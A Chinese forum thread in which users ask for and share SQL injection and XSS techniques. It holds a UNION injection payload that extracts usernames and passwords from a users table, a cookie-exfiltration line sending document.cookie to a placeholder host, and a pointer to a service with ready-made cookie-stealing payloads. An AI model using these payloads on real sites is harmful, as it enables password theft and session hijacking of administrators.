[求助]关于 SQL 注入

你想做啥。。。。囧

盲注？借助工具吧

@mhycy 这是学习啊...网站是我自己搭的..

@typcn 不是盲注 我知道网站源码

额。。 不是盲注的话，你得给大家看一下网页显示的源码吧。。

@RIcter
大大求助

@sandtears
http://pastebin.com/3h1NqKaS

已附上源码

报错的是语句，passwd都没查出来怎么返回？

@mhycy

-- Users schema

CREATE TABLE users(
id INTEGER PRIMARY KEY NOT NULL,
name TEXT NOT NULL,
surname TEXT NOT NULL,
username TEXT NOT NULL,
passwd TEXT NOT NULL,
is_admin BOOLEAN NOT NULL DEFAULT 'f'
);

刚睡醒看到已经解决了…
--

-1' union select password from xxx#

@RIcter 忘记 limit 0,1 了，完整 payload：

-1' union select concat(surname, 0x3a, passwd) from users limit 0,1#

@RIcter

还想问下一个关于XSS的问题

例如我可以在A站以普通用户的身份发布一个不被转义的内容.
A站管理员会访问我的网站(B站).

能否讲下大概怎样的过程能拿到A站管理员cookie里的内容?

有一种平台叫做 XSS 平台，比如这个： http://xssnow.com/index.php
里面有现成可利用的 payload 可以获取 Cookie。

以至于远离，大抵是这样：

先获取 Cookie：document.cookie
然后转义，POST Cookie 的内容到一个接收端，接受端获取后存入数据库。

@RIcter s/远离/原理/g

@MrGba2z >

window.open("http://xxx.com?cookie="+document.cookie)

@RIcter 没有邀请码 T_T.


@kslr @RIcter
我想象的流程是:

管理员访问我的网站, 我直接首页跳转到他的网站W页面, W页面有我发布的未转义内容, 访问该页面会执行脚本, 获取cookies并发到我的网站.

请问是否正确?

@MrGba2z 不要邀请码，随便打就行

@RIcter
提示邀请码不正确...

@MrGba2z 可能現在要邀請碼了吧⋯